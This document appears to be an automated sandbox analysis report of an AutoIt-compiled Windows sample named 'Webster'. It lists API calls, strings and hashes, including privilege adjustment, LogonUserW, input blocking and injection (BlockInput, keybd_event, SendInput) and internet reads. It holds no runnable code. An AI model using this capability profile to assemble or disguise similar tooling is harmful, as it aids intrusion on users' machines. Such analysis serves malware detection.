                                                                                  • Instruction ID: 648c980480628243c1c74e95b4b22b551074198d8838a542c2ad2fc64abfcc3f
                                                                                  • Opcode Fuzzy Hash: f87efcbf1854d9092afee6e66a56b51b5d5da2629fe22c7af7e85a8605a741b5
                                                                                  • Instruction Fuzzy Hash: 9211BF723009169FE7316F669C84A6FBFD9EF84760B408169F806D7281DE70E9018FA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: LocalTime__swprintf
                                                                                  • String ID: %.3d$WIN_XPe
                                                                                  • API String ID: 2070861257-2409531811
                                                                                  APIs
                                                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00AF2AAD
                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00AF2AE4
                                                                                  Similarity
                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                  • String ID:
                                                                                  • API String ID: 599397726-0
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                                                    • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AD93E3
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AD9410
                                                                                  • GetLastError.KERNEL32 ref: 00AD941D
                                                                                  Similarity
                                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 1922334811-0
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AE42FF
                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00AE433C
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AE4345
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 33631002-0
                                                                                  APIs
                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00AE4F45
                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AE4F5C
                                                                                  • FreeSid.ADVAPI32(?), ref: 00AE4F6C
                                                                                  Similarity
                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                  • String ID:
                                                                                  • API String ID: 3429775523-0
                                                                                  APIs
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AE1B01
                                                                                  • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00AE1B14
                                                                                  Similarity
                                                                                  • API ID: InputSendkeybd_event
                                                                                  • String ID:
                                                                                  • API String ID: 3536248340-0
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00AF9B52,?,00B1098C,?), ref: 00AEA6DA
                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00AF9B52,?,00B1098C,?), ref: 00AEA6EC
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatLastMessage
                                                                                  • String ID:
                                                                                  • API String ID: 3479602957-0
                                                                                  APIs
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AD8F27), ref: 00AD8DFE
                                                                                  • CloseHandle.KERNEL32(?,?,00AD8F27), ref: 00AD8E10
                                                                                  Similarity
                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                  • String ID:
                                                                                  • API String ID: 81990902-0
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AA8F87,?,?,?,00000001), ref: 00AAA38A
                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00AAA393
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  APIs
                                                                                  • BlockInput.USER32(00000001), ref: 00AF45F0
                                                                                  Similarity
                                                                                  • API ID: BlockInput
                                                                                  • String ID:
                                                                                  • API String ID: 3456056419-0
                                                                                  APIs
                                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00AE5205
                                                                                  Similarity
                                                                                  • API ID: mouse_event
                                                                                  • String ID:
                                                                                  • API String ID: 2434400541-0
                                                                                  APIs
                                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AD8FA7), ref: 00AD9389
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LogonUser
                                                                                  • String ID:
                                                                                  • API String ID: 1244722697-0
                                                                                  • Opcode ID: 0854604f25d62223c7ac238abbd63e833cdfba3f8a7efad1dd6aa6eedf71345d
                                                                                  • Instruction ID: 52c6625989d39161f9b8a1f11529b4d43dc9e1c31ac11883596ac3c91e06ca80
                                                                                  • Opcode Fuzzy Hash: 0854604f25d62223c7ac238abbd63e833cdfba3f8a7efad1dd6aa6eedf71345d
                                                                                  • Instruction Fuzzy Hash: 60D09E3226450EABEF019EA4DD05EEE3B69EB04B01F808511FE15D61A1CB75D935AB60
                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00AC0734
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: c3c843ba409625b0b08a3902044e2ebdf4230f0d8ed3730a2623107430487801
                                                                                  • Instruction ID: 89874b5e0a5ac1fe1730e6e2d3ab661db014f9df5b0ed76a3aab4b8256c6ad2e
                                                                                  • Opcode Fuzzy Hash: c3c843ba409625b0b08a3902044e2ebdf4230f0d8ed3730a2623107430487801
                                                                                  • Instruction Fuzzy Hash: 9AC04CF181010DDBCB05DBA0D988EEE77BCAB08305F114059A145B2100D7749B448A71
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00AAA35A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: b1115a0167e491ea8c7ed76d59703a08ece2ecb950937cb0a8261407825e05d7
                                                                                  • Instruction ID: c2d3e0d40518837f13437eb3b3eaab30e2d4e9077106cf6d2221920c396668db
                                                                                  • Opcode Fuzzy Hash: b1115a0167e491ea8c7ed76d59703a08ece2ecb950937cb0a8261407825e05d7
                                                                                  • Instruction Fuzzy Hash: B5A0123002010CA78A002B41FC044847F5CD6042507408010F40C01021CB7254504584
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?,00B10980), ref: 00B03C65
                                                                                  • IsWindowVisible.USER32(?), ref: 00B03C89
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpperVisibleWindow
                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                  • API String ID: 4105515805-45149045
                                                                                  • Opcode ID: d21f6bb0e190a0ef714a82f90d438d006c8331ddf8341555875d9ec4f4b515ed
                                                                                  • Instruction ID: 9b50e2e975de780103338a461ccd827b7ebafc53c846a0b60123545166f96c3d
                                                                                  • Opcode Fuzzy Hash: d21f6bb0e190a0ef714a82f90d438d006c8331ddf8341555875d9ec4f4b515ed
                                                                                  • Instruction Fuzzy Hash: C5D1A0312043018FCB14EF50C995AAEBBE5EF95744F204999F9466B3E2DB31EE4ACB41
                                                                                  APIs
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00B0AC55
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00B0AC86
                                                                                  • GetSysColor.USER32(0000000F), ref: 00B0AC92
                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00B0ACAC
                                                                                  • SelectObject.GDI32(?,?), ref: 00B0ACBB
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00B0ACE6
                                                                                  • GetSysColor.USER32(00000010), ref: 00B0ACEE
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00B0ACF5
                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00B0AD04
                                                                                  • DeleteObject.GDI32(00000000), ref: 00B0AD0B
                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00B0AD56
                                                                                  • FillRect.USER32(?,?,?), ref: 00B0AD88
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B0ADB3
                                                                                    • Part of subcall function 00B0AF18: GetSysColor.USER32(00000012), ref: 00B0AF51
                                                                                    • Part of subcall function 00B0AF18: SetTextColor.GDI32(?,?), ref: 00B0AF55
                                                                                    • Part of subcall function 00B0AF18: GetSysColorBrush.USER32(0000000F), ref: 00B0AF6B
                                                                                    • Part of subcall function 00B0AF18: GetSysColor.USER32(0000000F), ref: 00B0AF76
                                                                                    • Part of subcall function 00B0AF18: GetSysColor.USER32(00000011), ref: 00B0AF93
                                                                                    • Part of subcall function 00B0AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B0AFA1
                                                                                    • Part of subcall function 00B0AF18: SelectObject.GDI32(?,00000000), ref: 00B0AFB2
                                                                                    • Part of subcall function 00B0AF18: SetBkColor.GDI32(?,00000000), ref: 00B0AFBB
                                                                                    • Part of subcall function 00B0AF18: SelectObject.GDI32(?,?), ref: 00B0AFC8
                                                                                    • Part of subcall function 00B0AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00B0AFE7
                                                                                    • Part of subcall function 00B0AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B0AFFE
                                                                                    • Part of subcall function 00B0AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00B0B013
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                  • String ID:
                                                                                  • API String ID: 4124339563-0
                                                                                  • Opcode ID: 91461a6ddfcfaa62fad0c9bc655a092181c0bc6eae286d9b63a5e8b318dfaea6
                                                                                  • Instruction ID: 00923177e3e71bed276506ed193d79f4811bfb9dbda4e6a0de3a3b227b148044
                                                                                  • Opcode Fuzzy Hash: 91461a6ddfcfaa62fad0c9bc655a092181c0bc6eae286d9b63a5e8b318dfaea6
                                                                                  • Instruction Fuzzy Hash: EEA16E71018305AFD711AF64DC48AAB7BE9FF88321F508A19F562971E0DB74D984CF52
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,?,?), ref: 00A83072
                                                                                  • DeleteObject.GDI32(00000000), ref: 00A830B8
                                                                                  • DeleteObject.GDI32(00000000), ref: 00A830C3
                                                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 00A830CE
                                                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00A830D9
                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00ABC77C
                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00ABC7B5
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00ABCBDE
                                                                                    • Part of subcall function 00A81F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A82412,?,00000000,?,?,?,?,00A81AA7,00000000,?), ref: 00A81F76
                                                                                  • SendMessageW.USER32(?,00001053), ref: 00ABCC1B
                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00ABCC32
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ABCC48
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ABCC53
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                  • String ID: 0
                                                                                  • API String ID: 464785882-4108050209
                                                                                  • Opcode ID: b0ef2d8482f247ada9062d37245fd64cf29ddf8f585f3a9a000c1ca58165317b
                                                                                  • Instruction ID: 2871afd0d1ea0291c86677ecf8450749538d34708276429bb49449e1a896046c
                                                                                  • Opcode Fuzzy Hash: b0ef2d8482f247ada9062d37245fd64cf29ddf8f585f3a9a000c1ca58165317b
                                                                                  • Instruction Fuzzy Hash: A6129C31604201EFDB25EF24C884FE9BBB9BF08721F548569E495CB262CB71ED81CB91
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                  • API String ID: 2660009612-1645009161
                                                                                  • Opcode ID: 09ebec326c79f016d007c4f7e1cfb0006d837fa3806722325d2c49a0fd60970c
                                                                                  • Instruction ID: c9b3b5182aaed591879e55c987b62cecb946e5c7a486a5ad104d1202b6b238b3
                                                                                  • Opcode Fuzzy Hash: 09ebec326c79f016d007c4f7e1cfb0006d837fa3806722325d2c49a0fd60970c
                                                                                  • Instruction Fuzzy Hash: 37A18931B00209BBCF24AF61DE92FAE37F9AF45B40F104069F905AB292EB719E51D750
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(00000000), ref: 00AF7BC8
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AF7C87
                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00AF7CC5
                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00AF7CD7
                                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00AF7D1D
                                                                                  • GetClientRect.USER32(00000000,?), ref: 00AF7D29
                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00AF7D6D
                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AF7D7C
                                                                                  • GetStockObject.GDI32(00000011), ref: 00AF7D8C
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00AF7D90
                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00AF7DA0
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AF7DA9
                                                                                  • DeleteDC.GDI32(00000000), ref: 00AF7DB2
                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AF7DDE
                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AF7DF5
                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00AF7E30
                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AF7E44
                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AF7E55
                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00AF7E85
                                                                                  • GetStockObject.GDI32(00000011), ref: 00AF7E90
                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AF7E9B
                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00AF7EA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00AEB361
                                                                                  • GetDriveTypeW.KERNEL32(?,00B12C4C,?,\\.\,00B10980), ref: 00AEB43E
                                                                                  • SetErrorMode.KERNEL32(00000000,00B12C4C,?,\\.\,00B10980), ref: 00AEB59C
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DriveType
                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00B0A0F7
                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B0A1B0
                                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00B0A1CC
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID: 0
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000012), ref: 00B0AF51
                                                                                  • SetTextColor.GDI32(?,?), ref: 00B0AF55
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00B0AF6B
                                                                                  • GetSysColor.USER32(0000000F), ref: 00B0AF76
                                                                                  • CreateSolidBrush.GDI32(?), ref: 00B0AF7B
                                                                                  • GetSysColor.USER32(00000011), ref: 00B0AF93
                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B0AFA1
                                                                                  • SelectObject.GDI32(?,00000000), ref: 00B0AFB2
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00B0AFBB
                                                                                  • SelectObject.GDI32(?,?), ref: 00B0AFC8
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00B0AFE7
                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B0AFFE
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B0B013
                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B0B05F
                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B0B086
                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00B0B0A4
                                                                                  • DrawFocusRect.USER32(?,?), ref: 00B0B0AF
                                                                                  • GetSysColor.USER32(00000011), ref: 00B0B0BD
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00B0B0C5
                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B0B0D9
                                                                                  • SelectObject.GDI32(?,00B0AC1F), ref: 00B0B0F0
                                                                                  • DeleteObject.GDI32(?), ref: 00B0B0FB
                                                                                  • SelectObject.GDI32(?,?), ref: 00B0B101
                                                                                  • DeleteObject.GDI32(?), ref: 00B0B106
                                                                                  • SetTextColor.GDI32(?,?), ref: 00B0B10C
                                                                                  • SetBkColor.GDI32(?,?), ref: 00B0B116
                                                                                  Similarity
                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                  • String ID:
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B090EA
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B090FB
                                                                                  • CharNextW.USER32(0000014E), ref: 00B0912A
                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B0916B
                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B09181
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B09192
                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B091AF
                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00B091FB
                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B09211
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B09242
                                                                                  • _memset.LIBCMT ref: 00B09267
                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B092B0
                                                                                  • _memset.LIBCMT ref: 00B0930F
                                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B09339
                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B09391
                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00B0943E
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00B09460
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B094AA
                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B094D7
                                                                                  • DrawMenuBar.USER32(?), ref: 00B094E6
                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00B0950E
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                  • String ID: 0
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 00B05007
                                                                                  • GetDesktopWindow.USER32 ref: 00B0501C
                                                                                  • GetWindowRect.USER32(00000000), ref: 00B05023
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B05085
                                                                                  • DestroyWindow.USER32(?), ref: 00B050B1
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B050DA
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B050F8
                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B0511E
                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00B05133
                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B05146
                                                                                  • IsWindowVisible.USER32(?), ref: 00B05166
                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B05181
                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B05195
                                                                                  • GetWindowRect.USER32(?,?), ref: 00B051AD
                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00B051D3
                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00B051ED
                                                                                  • CopyRect.USER32(?,?), ref: 00B05204
                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00B0526F
                                                                                  Similarity
                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                  • String ID: ($0$tooltips_class32
                                                                                  APIs
                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AE499C
                                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AE49C2
                                                                                  • _wcscpy.LIBCMT ref: 00AE49F0
                                                                                  • _wcscmp.LIBCMT ref: 00AE49FB
